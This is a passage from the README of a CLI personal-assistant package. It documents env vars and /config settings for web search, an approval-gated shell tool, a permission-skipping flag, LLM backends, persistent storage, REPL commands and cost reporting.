a\ncontent preview and asks for confirmation before the turn is resumed with\n`{ approved, pendingActionId }` — declining discards the staged write; nothing\nis ever written without an explicit yes. A `run_shell_command` call is shown\nthe same way, printing the exact command and resolved `cwd` instead.\n\nSet `ASSISTANT_ENABLE_WEB=1` to give the model real `web_search`/`fetch_url`\ntools (no approval needed — see \"Web access via tools\" above; on the proxy\nbackend this defaults to `duckDuckGoSearch` as the search implementation) and\n`ASSISTANT_ENABLE_SHELL=1` to give it a real, approval-gated\n`run_shell_command` tool scoped to `ASSISTANT_WORKSPACE_DIR`. Both are off by\ndefault; `ASSISTANT_ENABLE_SHELL` must be exactly `\"1\"` (a stray\n`ASSISTANT_ENABLE_SHELL=0` left in an env file does not enable it). Optional\n`ASSISTANT_SHELL_TIMEOUT_MS` (default 30000) tunes the shell timeout:\n\n```bash\nASSISTANT_ENABLE_WEB=1 ASSISTANT_ENABLE_SHELL=1 npm run cli --workspace=packages/personal-assistant\n```\n\nThe startup banner only mentions a capability when it's actually enabled —\nnothing implies web/shell access is available when neither env var is set.\n`ASSISTANT_ENABLE_WEB` now works on both backends: the proxy backend calls the\ninjected search function directly, and the Claude CLI backend registers\n`web_search` on its file-tools MCP server (DuckDuckGo by default, Brave when\n`ASSISTANT_SEARCH_BACKEND=brave` + `BRAVE_SEARCH_API_KEY` are set).\n\n#### `--dangerously-skip-permissions` equivalent\n\nSet `ASSISTANT_DANGEROUSLY_SKIP_PERMISSIONS=1` (or `/config set\ndangerouslySkipPermissions true`) to skip *every* approval prompt automatically\n— the message-level risk gate (a HIGH-risk message like \"send an email...\")\nand `write_file`/`run_shell_command`'s per-call staging both resolve as if you\nhad already said yes. Off by default, and named to match Claude Code's own\nflag: it is exactly as dangerous as it sounds — a proposed shell command or\nfile write executes with zero chance to review it first. The underlying\nsandboxing (workspace-root path scoping, the shell env allowlist, output\ntruncation, the timeout) is unaffected; this only skips the ask, never the\nlimits underneath it. The startup banner switches shell's capability label\nfrom \"approval-gated\" to \"NOT approval-gated\" and prints an extra `⚠` line\nwhenever this is on, so it's never silently in effect.\n\n#### Non-interactive / scripted use\n\nPiping input into the CLI (`echo \"...\" | npm run cli ...`, or any non-TTY stdin)\nused to hit an approval gate as an *incidental* consequence of `readline`\neagerly draining and closing piped stdin before a slow turn reaches the\nprompt: `rl.question()` throws, the fail-closed catch logs a generic\n`[could not read a response — treating as declined]`, and the turn is\ndeclined. That fail-closed outcome was always correct, but it read as\nsomething to be rediscovered by piping input at it rather than a documented\ndecision. `ASSISTANT_NON_INTERACTIVE_APPROVAL` makes it explicit:\n\n- `ASSISTANT_NON_INTERACTIVE_APPROVAL=decline` — every approval gate\n  auto-declines immediately, without ever touching stdin. The right choice\n  for scripted/CI use where every HIGH-risk or staged write/shell action\n  should always be rejected outright:\n\n  ```bash\n  ASSISTANT_NON_INTERACTIVE_APPROVAL=decline npm run cli --workspace=packages/personal-assistant < script.txt\n  ```\n\n- `ASSISTANT_NON_INTERACTIVE_APPROVAL=require-tty` — fails fast at startup\n  with a clear error if stdin isn't a real TTY, instead of running an entire\n  session that can only discover the problem deep in, at the first approval\n  prompt.\n\nLeaving it unset keeps today's behavior (interactive prompt on a real TTY,\nfail-closed decline on piped stdin) exactly as before — this only makes the\npiped-stdin case an intentional choice instead of an implicit one. An\nunrecognized value is ignored, with a startup warning, rather than silently\npicking one of the two behaviors for you.\n\n#### Using Brave Search instead of DuckDuckGo\n\nBy default, `ASSISTANT_ENABLE_WEB=1` uses the free, keyless `duckDuckGoSearch`\nprovider. To use the [Brave Search API](https://api.search.brave.com/app/keys)\ninstead, opt in explicitly with `ASSISTANT_SEARCH_BACKEND=brave` and supply\n`BRAVE_SEARCH_API_KEY`:\n\n```bash\nASSISTANT_ENABLE_WEB=1 ASSISTANT_SEARCH_BACKEND=brave BRAVE_SEARCH_API_KEY=your-key \\\n  npm run cli --workspace=packages/personal-assistant\n```\n\n`ASSISTANT_SEARCH_BACKEND` must be exactly `\"brave\"` to switch providers —\nany other value (or leaving it unset) keeps the DuckDuckGo default. If\n`ASSISTANT_SEARCH_BACKEND=brave` is set without `BRAVE_SEARCH_API_KEY`, the\nCLI fails fast at startup with an error rather than silently falling back to\nDuckDuckGo, since a missing key there is almost always a misconfiguration.\nThe active backend is shown in the startup banner (e.g. `web search/fetch\n(brave)`). Both `searchBackend` and `braveApiKey` can also be set from inside\na running session with `/config set` instead of an env var — see\n\"Configuration\" below.\n\nSet `ASSISTANT_LLM_BACKEND=claude-cli` to skip the proxy entirely and run turns\nthrough a local `claude -p` subprocess instead, using your already-authenticated\nClaude Code CLI session rather than an API key (`CLAUDE_PATH` overrides the\n`claude` binary path if it's not on `PATH`):\n\n```bash\nASSISTANT_LLM_BACKEND=claude-cli npm run cli --workspace=packages/personal-assistant\n```\n\nOr skip both the proxy and claude-cli and call a provider directly with your\nown API key — `ASSISTANT_LLM_BACKEND=anthropic|openai|openrouter` plus\n`ASSISTANT_API_KEY`:\n\n```bash\nASSISTANT_LLM_BACKEND=anthropic ASSISTANT_API_KEY=sk-ant-... \\\n  npm run cli --workspace=packages/personal-assistant\n\nASSISTANT_LLM_BACKEND=openai ASSISTANT_API_KEY=sk-... \\\n  npm run cli --workspace=packages/personal-assistant\n\nASSISTANT_LLM_BACKEND=openrouter ASSISTANT_API_KEY=sk-or-... \\\n  npm run cli --workspace=packages/personal-assistant\n```\n\nThese three go straight from this process to the provider's own API\n(`AnthropicLLMClient`/`OpenAICompatibleLLMClient` in `@buildaharness/runtime`)\n— no proxy deployment needed, but unlike `authToken` (a self-hosted proxy's\nown bearer token), `ASSISTANT_API_KEY`/`apiKey` is a *real* provider key.\nIt's stored the same way as every other secret field here — plaintext in\n`config.json`, not an OS keychain — so treat that file accordingly. When\n`ASSISTANT_MODEL`/`/config set model` isn't set, each backend falls back to the\ncurrent-generation default id exported from `@buildaharness/runtime`'s\n`model-defaults.ts` (`openai` → `gpt-5-mini`, `openrouter` →\n`anthropic/claude-sonnet-5`, `anthropic` and `proxy` → `claude-sonnet-5`).\n\nTranscript, learned experience, reminders, and any in-flight turn's checkpoint\npersist as real files under `~/.buildaharness/personal-assistant/`\n(`transcripts/`, `experience/`, `reminders/`, `checkpoints/`), so conversation\nhistory and learning survive between runs — quit and restart the CLI and it\nremembers.\n\n## Configuration\n\nEvery env var documented above (`ASSISTANT_ENABLE_WEB`, `ASSISTANT_SEARCH_BACKEND`,\n`BRAVE_SEARCH_API_KEY`, `ASSISTANT_ENABLE_SHELL`, `ASSISTANT_SHELL_TIMEOUT_MS`,\n`ASSISTANT_DANGEROUSLY_SKIP_PERMISSIONS`, `ASSISTANT_LLM_BACKEND`,\n`ASSISTANT_PROXY_URL`, `ASSISTANT_PROXY_TOKEN`, `ASSISTANT_API_KEY`,\n`ASSISTANT_MODEL`, `ASSISTANT_WORKSPACE_DIR`) keeps working exactly as\ndescribed — nothing here is a breaking change. What's new is a persisted\nsettings layer *beneath* those env vars, editable from inside a running CLI\nsession with `/config`, so a setting survives across runs without needing an\nenv var set every time:\n\n```\nyou> /config\n  llmBackend     proxy\n  proxyUrl       http://localhost:8787\n  authToken      (not set)\n  apiKey         (not set)\n  model          (not set)\n  enableWeb      true    (env-pinned: ASSISTANT_ENABLE_WEB)\n  searchBackend  ddg\n  braveApiKey    (not set)\n  enableShell    false\n  shellTimeoutMs (not set)\n  workspaceRoot  (not set)\n  dangerouslySkipPermissions false\n\nyou> /config set searchBackend brave\n✗ searchBackend \"brave\" requires braveApiKey to be set.\n\nyou> /config set braveApiKey sk-...\n✓ braveApiKey updated (took effect immediately, no restart needed)\n\nyou> /config set searchBackend brave\n✓ searchBackend updated (took effect immediately, no restart needed)\n\nyou> /config reset searchBackend\n✓ Reset searchBackend to default\n```\n\n- `/config` lists every field's current (resolved) value. A field currently\n  pinned by an env var shows `(env-pinned: VAR_NAME)` and cannot be changed\n  with `/config set` — unset the env var first.\n- `/config set <key> <value>` validates the change (e.g. `searchBackend brave`\n  is rejected without a `braveApiKey` already set) before persisting it, then\n  rebuilds the running assistant so the change applies to the very next turn —\n  no restart needed.\n- `/config reset [key]` clears one persisted key (or, with no key, every\n  persisted key), reverting to the env var if still set, or the built-in\n  default otherwise.\n\n**Precedence**: env var > persisted config > built-in default, evaluated\nindependently per field. Settings persist as plain JSON at\n`~/.buildaharness/personal-assistant/config.json` — like the rest of this\npackage's persistence, it's a real file, not encrypted, so `authToken` and\n`braveApiKey` are stored in plaintext there. This is the same trust boundary\nthe repo's root `.env` already has, not a new one.\n\n## REPL commands\n\nType `/help` inside a running CLI session for this list. All of them read or\nchange local session/config state — none of them make an LLM call themselves.\n\n| Command | What it does |\n|---|---|\n| `/help` | Show this list |\n| `/clear` (alias `/new`) | Start a fresh conversation — deletes this session's transcript, extracted facts, and active plan. Leaves learned reminders/experience untouched (those are durable, cross-conversation learning, not conversation-scoped state) |\n| `/status` | Show the resolved config (model, backend, workspace, enabled capabilities — same as the startup banner) plus this session's transcript length and whether a plan is active |\n| `/export [file]` | Save this session's transcript to a markdown file (default: `assistant-transcript-<timestamp>.md` in the current directory) |\n| `/undo` | Remove the last exchange from conversation history — a completed turn drops both the user message and the reply; a turn still awaiting approval drops just the pending message. Only affects what the model remembers: a real `write_file`/`run_shell_command` effect from that turn is **not** reversed |\n| `/memory` | Show facts learned about you, reminders created so far, and the learning-layer `ExperienceStore`'s real content — every strategy weight, plus the 20 most recently learned decompositions/recovery sequences (newest first), not just counts |\n| `/memory export [file]` | Write the full, unbounded `ExperienceStore` contents (every strategy weight/decomposition/recovery sequence, not the 20-entry preview `/memory` prints) plus facts/reminders to a JSON file (default: `assistant-memory-<timestamp>.json`). Read-only: there's no matching import path, so exported data can't be hand-edited and loaded back in |\n| `/search <query>` | Ranked search over past messages, across every session in this install — a hit is the one message that matched, not the whole session transcript around it. Read-only: never an LLM call or network request. Scoring is tokenized/graduated, not exact-substring-only (see \"Conversation history\" above), and a query matching nothing returns an explicit \"no results\" line |\n| `/model [name]` | Show the active model, or switch it — a thin alias over `/config set model <name>` (see \"Configuration\" above); rejected the same way if `model` is pinned by `ASSISTANT_MODEL` |\n| `/cost` | Show token usage for the last turn and the running session total |\n| `/doctor` | Check proxy reachability (proxy backend) or the `claude` binary (claude-cli backend), plus workspace root and data dir health — no dedicated check yet for the anthropic/openai/openrouter backends, only the backend-agnostic checks run for those |\n| `/why` | Explain the harness path the last turn took (verification confidence + node sequence) |\n| `/sources` | List files/URLs the last turn actually consulted |\n| `/plan` | Show the active structured plan's task status |\n| `/checkpoint [clear]` | Inspect a stuck in-progress harness checkpoint (step, node, failed-resume count so far), or `/checkpoint clear` to discard it — see \"Recovering a stuck checkpoint\" above. Scoped to just the checkpoint: unlike `/clear`, transcript/facts/plan are untouched |\n\n### `/cost` and real vs. estimated dollar figures\n\nToken counts are always real, on every backend. The dollar figure attached to\nthem is not always the same kind of number:\n\n- **claude-cli backend**: `costUsd` comes straight from `claude\n  --output-format json`'s own `total_cost_usd` field — real Anthropic\n  accounting. It may read `$0` if the underlying `claude` session is\n  authenticated against a Pro/Max subscription rather than API billing, in\n  which case `$0` does *not* mean \"this turn was free\" — `/cost`'s output\n  says so explicitly.\n- **every other backend** (`proxy`, `anthropic`, `openai`, `openrouter`):\n  none of these compute a dollar cost themselves — only the raw token counts\n  each provider's response already includes (`@buildaharness/proxy` is a thin\n  pass-through, see `packages/proxy/src/forward.ts`; the three direct clients\n  in `@buildaharness/runtime` are the same). `/cost` falls back to a small\n  static, hand-maintained pricing table (`model-pricing.ts`, Sonnet/Opus/Haiku\n  list prices) to show an *approximate* estimate, clearly labeled as such,\n  not real billing data.\n\n## Commands\n\n```bash\nnpm run build --workspace=packages/personal-assistant\nnpm test --workspace=packages/personal-assistant\nnpm run typecheck --workspace=packages/personal-assistant\n```\n","readmeFilename":"README.md"}